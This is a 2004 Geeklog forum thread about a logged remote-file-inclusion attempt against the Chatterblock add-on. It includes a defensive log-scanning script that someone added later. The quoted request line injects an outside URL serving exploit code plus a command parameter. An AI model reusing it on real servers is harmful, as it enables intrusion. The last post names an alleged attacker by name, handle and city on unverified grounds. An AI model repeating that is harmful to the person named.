
Geeklog Forums



Attention: I have detected some attack attempts this morning, and they are coming from http://mail.omd.it/ using a cross script.

Here is the log file:
- - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225 - "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0"

As you can see, they tried to use the cmd1.txt. If you check the following URL, http://mail.omd.it/cmd1.txt, you'll see the code, which I haven't examined yet.


*censored* me, I think the omd has been hacked and the guy redirected the page to my site. If you go to http://omd.it it will go to my site. WTF



Forum User
Registered: 05/05/04
Posts: 5
I have blocked them on my server, but something is going on. I didn't have my chatterblock enabled; that is what stopped them from uploading the exploit into my server.


Well spotted! Anyone got geeklog on a test server to check this out?



Site Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
The cmd1.txt contains the C source code for a Linux kernel exploit. So it looks like, if this somehow gets executed, it's trying to compile and run that exploit (probably to get root access on the webserver).

Of course, anybody running a webserver on Linux should have updated their kernel by now (the exploit seems to be old) ...

I'm not sure what the Chatterblock does with that manipulated URL, so it's possible that it's not run at all. In any case, it wouldn't hurt to hide your Chatterblock from anonymous users (go to the Admin's blocks menu and uncheck the "Anonymous R" checkbox for the Chatterblock).

bye, Dirk



Site Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
After a quick look through the source for cb_chatLog.php I have to doubt that anything was or would be executed here. The "show" parameter is used as a numeric value in the Chatterblock, doing some calculations, for example.

So to me, this looks pretty harmless.

We're actually seeing quite a lot of these attempts to stick URLs into parameters. But since Geeklog (and, it seems, the Chatterblock) won't visit those URLs on its own, these "hacking attempts" (if you can even call them that) won't accomplish anything.

bye, Dirk
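
A log check for the pattern discussed in this thread, as an added example that is not part of the original posts or of Geeklog: it flags requests whose query parameters carry an absolute URL, as in the quoted `show=http://...` request. The client addresses and the second and third log lines are constructed, and the function and field names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Apache common log format. The first request line is the
# one quoted in the thread; client addresses are documentation-range
# placeholders and the other two lines are invented for contrast.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225
192.0.2.22 - - [07/Jul/2004:21:40:12 +0100] "GET /chatterblock/cb_chatLog.php?show=20 HTTP/1.0" 200 5120
192.0.2.31 - - [07/Jul/2004:21:41:03 +0100] "GET /index.php?topic=news HTTP/1.1" 200 8841
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A parameter value that is itself an absolute URL is the marker to look for.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_url_params(log_text):
    """Return one finding per query parameter whose value is an absolute URL."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        parts = urlsplit(m.group("target"))
        params = parse_qsl(parts.query, keep_blank_values=True)
        for name, value in params:  # parse_qsl percent-decodes the values
            if REMOTE_URL_RE.match(value):
                findings.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "path": parts.path,
                    "param": name,
                    "remote_url": value,
                    # Other parameters sent along with the URL, e.g. cmd=id.
                    "other_params": [n for n, _ in params if n != name],
                    # Status shows whether the script existed and answered.
                    "status": int(m.group("status")),
                })
    return findings


if __name__ == "__main__":
    for f in find_url_params(SAMPLE_LOG):
        print(f)
```

The status field separates probes against scripts that are not installed (404, as in the quoted line) from probes the application actually answered, which are the ones worth checking against the script's handling of that parameter.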


I found out who these people are.
His handle is magnific.
He's rooted a lot of machines, including the one he used to attack me.

His name is Rodrigo and I almost have the place where he studies. He lives in a city called Sao Jose dos Campos SP; he is a Brazilian hacker.
